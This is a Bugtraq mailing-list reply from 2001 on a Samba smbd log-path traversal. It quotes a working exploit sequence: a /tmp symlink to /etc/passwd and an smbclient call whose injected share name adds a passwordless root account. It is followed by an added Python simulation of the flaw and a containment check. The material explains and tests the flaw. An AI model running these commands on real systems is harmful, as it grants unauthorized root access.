Bugtraq mailing list archives

Re: smbd remote file creation vulnerability
From: Joachim Blaabjerg <styx () mailbox as>
Date: Tue, 26 Jun 2001 11:08:04 +0200

Pavol Luptak <wilder () hq alert sk> wrote:

[wilder () lysurus wilder]$ cat /etc/redhat-release 
Linux Mandrake release 8.0 (Traktopel) for i586
[wilder () lysurus wilder]$ rpm -q pam
[wilder () lysurus wilder]$ egrep "log file" /etc/smb.conf
# this tells Samba to use a separate log file for each machine
   log file = /var/log/samba/%m.log    (= changed from default log.%m)
# Put a capping on the size of the log files (in Kb).
[wilder () lysurus wilder]$ rpm -qf /usr/sbin/smbd
[wilder () lysurus wilder]$ ln -s /etc/passwd /tmp/x.log
[wilder () lysurus wilder]$ smbclient //localhost/"`perl -e '{print
"\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
added interface ip= bcast= nmask=
Anonymous login successful
Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9]
[wilder () lysurus wilder]$ tail /etc/passwd
[2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927)
  Rejecting user 'wilder': authentication failed
[2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)
  ../../../tmp/x ( couldn't find service 
[wilder () lysurus wilder]$ su toor
[root () lysurus wilder]#

Appending to /etc/passwd has nothing to do with PAM.

No, not directly, but if your `su` uses PAM to authenticate users and PAM
reacts to the spaces in the beginning of the passwd file, it surely has
something to do with PAM. To check whether `su` uses PAM or not, try "ldd
`which su`|grep libpam"


Joachim Blaabjerg
styx () mailbox as 
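The two mechanisms the thread is built on, as an added illustration that is not part of the original post and not Samba's code: a naive "%m" substitution in the "log file" setting that a NetBIOS name containing "../" drives out of the log directory (beside a containment check, which is an assumed mitigation and not necessarily Samba's actual fix), and what the injected share name looks like once the smbd log entry quoted in the post lands in /etc/passwd. The passwd reader, the in-memory files and the /tmp/x.log symlink are all constructed for the example; real libc and PAM readers differ in detail, which is exactly the question Joachim raises.

```python
"""Added illustration of the two mechanisms described in the thread.  Not
Samba code and not from the original post: it re-implements, in Python,
(1) an unsanitized '%m' substitution in the 'log file' setting beside a
containment check (an assumed mitigation), and (2) the injected share name
landing in /etc/passwd through the log entry quoted in the post.  Files and
the /tmp/x.log symlink are simulated in memory with constructed contents."""
import posixpath
from typing import Dict, List, Tuple

LOG_DIR = "/var/log/samba"
LOG_FILE_SETTING = LOG_DIR + "/%m.log"   # the changed setting from the post


def expand_log_path(setting: str, machine: str) -> str:
    """Unsanitized %m substitution: whatever the client sent as its NetBIOS
    name is spliced straight into the path."""
    return posixpath.normpath(setting.replace("%m", machine))


def expand_log_path_hardened(setting: str, machine: str) -> str:
    """Same substitution, but reject any result that resolves outside LOG_DIR.
    (Assumption: one reasonable mitigation; Samba's own fix may differ.)"""
    path = expand_log_path(setting, machine)
    if posixpath.commonpath([path, LOG_DIR]) != LOG_DIR:
        raise ValueError("machine name %r escapes %s" % (machine, LOG_DIR))
    return path


def render_log_entry(service: str) -> str:
    """Shape of the smbd entry quoted in the post: a header line, then two
    spaces, the requested service name, and " ( couldn't find service"."""
    return ("[2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)\n"
            "  %s ( couldn't find service\n" % service)


def append_to_log(files: Dict[str, str], symlinks: Dict[str, str],
                  path: str, data: str) -> str:
    """Append 'data' to 'path', following one level of simulated symlink.
    Returns the file actually written."""
    target = symlinks.get(path, path)
    files[target] = files.get(target, "") + data
    return target


def parse_passwd(text: str) -> List[dict]:
    """Constructed, tolerant passwd reader: keep lines with exactly seven
    colon-separated fields and a numeric uid/gid, skip everything else."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue            # log header, the bare "  " line, the " ( couldn't..." tail
        name, pw, uid, gid, gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        entries.append({"name": name, "passwd": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries


def run_attack(machine: str = "../../../tmp/x",
               service: str = "\ntoor::0:0::/:/bin/sh\n") -> Tuple[str, List[dict]]:
    """Simulate the post: /tmp/x.log -> /etc/passwd, then one anonymous
    connection attempt to the injected share name.  Returns the file that
    was written and the uid-0 entries with an empty password field."""
    files = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"}   # constructed
    symlinks = {"/tmp/x.log": "/etc/passwd"}
    written = append_to_log(files, symlinks,
                            expand_log_path(LOG_FILE_SETTING, machine),
                            render_log_entry(service))
    backdoors = [e for e in parse_passwd(files["/etc/passwd"])
                 if e["uid"] == 0 and e["passwd"] == ""]
    return written, backdoors


if __name__ == "__main__":
    target, accounts = run_attack()
    print("log entry written to", target)
    for acct in accounts:
        print("passwordless uid-0 account:", acct["name"])
    try:
        expand_log_path_hardened(LOG_FILE_SETTING, "../../../tmp/x")
    except ValueError as exc:
        print("hardened expansion refused:", exc)
```

Two details of the payload from the post show up when this runs: the leading "\n" in the share name is what puts "toor" at column 0 instead of behind the two-space indent of the log line, and the trailing "\n" pushes " ( couldn't find service" onto a line of its own, so the only well-formed new passwd entry is the uid-0 account with an empty password field. Whether a given `su` (PAM-backed or not) skips the surrounding junk lines is the point under discussion in the thread, and is not settled by this model.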
